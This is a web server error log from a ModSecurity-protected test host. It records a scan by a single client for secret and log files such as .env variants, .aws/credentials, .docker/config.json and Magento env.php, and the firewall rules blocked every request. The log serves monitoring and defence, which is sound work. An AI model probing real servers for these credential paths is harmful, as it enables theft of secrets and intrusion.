[Mon Jan 12 12:28:29.292805 2026] [:error] [pid 1362231] [client 13.40.27.204:44716] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dev.local"] [unique_id "aWTa3cuCkgRo958sQERiDAAAAAc"]
[Mon Jan 12 12:28:29.293010 2026] [:error] [pid 1362231] [client 13.40.27.204:44716] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dev.local"] [unique_id "aWTa3cuCkgRo958sQERiDAAAAAc"]
[Mon Jan 12 12:28:29.293163 2026] [:error] [pid 1362231] [client 13.40.27.204:44716] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dev.local"] [unique_id "aWTa3cuCkgRo958sQERiDAAAAAc"]
[Mon Jan 12 12:28:29.498013 2026] [:error] [pid 1355923] [client 13.40.27.204:44778] [client 13.40.27.204] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aWTa3SE1xEBhFyXickXregAAAAA"]
[Mon Jan 12 12:28:29.498237 2026] [:error] [pid 1355923] [client 13.40.27.204:44778] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aWTa3SE1xEBhFyXickXregAAAAA"]
[Mon Jan 12 12:28:29.498430 2026] [:error] [pid 1355923] [client 13.40.27.204:44778] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aWTa3SE1xEBhFyXickXregAAAAA"]
[Mon Jan 12 12:28:29.600161 2026] [authz_core:error] [pid 1355926] [client 13.40.27.204:44818] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xml
[Mon Jan 12 12:28:29.791050 2026] [:error] [pid 1355925] [client 13.40.27.204:44880] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.remote"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.remote"] [unique_id "aWTa3U7thAymmecRvtl0NgAAAAI"]
[Mon Jan 12 12:28:29.791253 2026] [:error] [pid 1355925] [client 13.40.27.204:44880] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.remote"] [unique_id "aWTa3U7thAymmecRvtl0NgAAAAI"]
[Mon Jan 12 12:28:29.791435 2026] [:error] [pid 1355925] [client 13.40.27.204:44880] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.remote"] [unique_id "aWTa3U7thAymmecRvtl0NgAAAAI"]
[Mon Jan 12 12:28:29.886214 2026] [:error] [pid 1355924] [client 13.40.27.204:44908] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aWTa3dIpinFXoPzDav5wXAAAAAE"]
[Mon Jan 12 12:28:29.886441 2026] [:error] [pid 1355924] [client 13.40.27.204:44908] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aWTa3dIpinFXoPzDav5wXAAAAAE"]
[Mon Jan 12 12:28:29.886587 2026] [:error] [pid 1355924] [client 13.40.27.204:44908] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aWTa3dIpinFXoPzDav5wXAAAAAE"]
[Mon Jan 12 12:28:29.983658 2026] [:error] [pid 1365300] [client 13.40.27.204:44930] [client 13.40.27.204] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/logs/error.log"] [unique_id "aWTa3dlKlmIJBGbQbR78TQAAAAs"]
[Mon Jan 12 12:28:29.983967 2026] [:error] [pid 1365300] [client 13.40.27.204:44930] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/logs/error.log"] [unique_id "aWTa3dlKlmIJBGbQbR78TQAAAAs"]
[Mon Jan 12 12:28:29.984133 2026] [:error] [pid 1365300] [client 13.40.27.204:44930] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/logs/error.log"] [unique_id "aWTa3dlKlmIJBGbQbR78TQAAAAs"]
[Mon Jan 12 12:28:30.081113 2026] [:error] [pid 1358564] [client 13.40.27.204:44952] [client 13.40.27.204] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/php_error.log"] [unique_id "aWTa3h_UgGRJ4jDk47tQYgAAAAY"]
[Mon Jan 12 12:28:30.081412 2026] [:error] [pid 1358564] [client 13.40.27.204:44952] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/php_error.log"] [unique_id "aWTa3h_UgGRJ4jDk47tQYgAAAAY"]
[Mon Jan 12 12:28:30.081559 2026] [:error] [pid 1358564] [client 13.40.27.204:44952] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/php_error.log"] [unique_id "aWTa3h_UgGRJ4jDk47tQYgAAAAY"]
[Mon Jan 12 12:28:30.673453 2026] [authz_core:error] [pid 1355925] [client 13.40.27.204:45128] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/var/log/nginx
[Mon Jan 12 12:28:30.770943 2026] [authz_core:error] [pid 1355924] [client 13.40.27.204:45152] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/var/log/apache2
[Mon Jan 12 12:28:30.871634 2026] [authz_core:error] [pid 1365300] [client 13.40.27.204:45192] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php
[Mon Jan 12 12:28:30.966730 2026] [:error] [pid 1358564] [client 13.40.27.204:45220] [client 13.40.27.204] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/logs/application.log"] [unique_id "aWTa3h_UgGRJ4jDk47tQYwAAAAY"]
[Mon Jan 12 12:28:30.967056 2026] [:error] [pid 1358564] [client 13.40.27.204:45220] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/logs/application.log"] [unique_id "aWTa3h_UgGRJ4jDk47tQYwAAAAY"]
[Mon Jan 12 12:28:30.967253 2026] [:error] [pid 1358564] [client 13.40.27.204:45220] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/logs/application.log"] [unique_id "aWTa3h_UgGRJ4jDk47tQYwAAAAY"]
[Mon Jan 12 12:28:31.055538 2026] [authz_core:error] [pid 1362231] [client 13.40.27.204:45238] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/logs
[Mon Jan 12 12:28:31.146624 2026] [authz_core:error] [pid 1356126] [client 13.40.27.204:45262] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/logs
[Mon Jan 12 12:28:32.077539 2026] [:error] [pid 1356126] [client 13.40.27.204:45536] [client 13.40.27.204] ModSecurity: Warning. Matched phrase ".aws/config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/config found within REQUEST_FILENAME: /.aws/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aWTa4Dv8xyMiuvwfNnljyQAAAAU"]
[Mon Jan 12 12:28:32.077747 2026] [:error] [pid 1356126] [client 13.40.27.204:45536] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aWTa4Dv8xyMiuvwfNnljyQAAAAU"]
[Mon Jan 12 12:28:32.077898 2026] [:error] [pid 1356126] [client 13.40.27.204:45536] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aWTa4Dv8xyMiuvwfNnljyQAAAAU"]
[Mon Jan 12 12:28:32.558986 2026] [:error] [pid 1355924] [client 13.40.27.204:45672] [client 13.40.27.204] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/errors.log"] [unique_id "aWTa4NIpinFXoPzDav5wXwAAAAE"]
[Mon Jan 12 12:28:32.559299 2026] [:error] [pid 1355924] [client 13.40.27.204:45672] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/errors.log"] [unique_id "aWTa4NIpinFXoPzDav5wXwAAAAE"]
[Mon Jan 12 12:28:32.559450 2026] [:error] [pid 1355924] [client 13.40.27.204:45672] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/errors.log"] [unique_id "aWTa4NIpinFXoPzDav5wXwAAAAE"]
[Mon Jan 12 12:28:32.655267 2026] [:error] [pid 1365300] [client 13.40.27.204:45698] [client 13.40.27.204] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".db"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/Thumbs.db"] [unique_id "aWTa4NlKlmIJBGbQbR78UAAAAAs"]
[Mon Jan 12 12:28:32.655584 2026] [:error] [pid 1365300] [client 13.40.27.204:45698] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/Thumbs.db"] [unique_id "aWTa4NlKlmIJBGbQbR78UAAAAAs"]
[Mon Jan 12 12:28:32.655737 2026] [:error] [pid 1365300] [client 13.40.27.204:45698] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/Thumbs.db"] [unique_id "aWTa4NlKlmIJBGbQbR78UAAAAAs"]
[Mon Jan 12 12:28:33.144286 2026] [:error] [pid 1355926] [client 13.40.27.204:45840] [client 13.40.27.204] ModSecurity: Warning. Matched phrase ".docker/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .docker/ found within REQUEST_FILENAME: /.docker/config.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.docker/config.json"] [unique_id "aWTa4cC2y5bYy1r2HoPzFQAAAAM"]
[Mon Jan 12 12:28:33.144480 2026] [:error] [pid 1355926] [client 13.40.27.204:45840] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.docker/config.json"] [unique_id "aWTa4cC2y5bYy1r2HoPzFQAAAAM"]
[Mon Jan 12 12:28:33.144634 2026] [:error] [pid 1355926] [client 13.40.27.204:45840] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.docker/config.json"] [unique_id "aWTa4cC2y5bYy1r2HoPzFQAAAAM"]
[Mon Jan 12 12:28:34.219010 2026] [:error] [pid 1355925] [client 13.40.27.204:46130] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.2"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.2"] [unique_id "aWTa4k7thAymmecRvtl0OwAAAAI"]
[Mon Jan 12 12:28:34.219223 2026] [:error] [pid 1355925] [client 13.40.27.204:46130] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.2"] [unique_id "aWTa4k7thAymmecRvtl0OwAAAAI"]
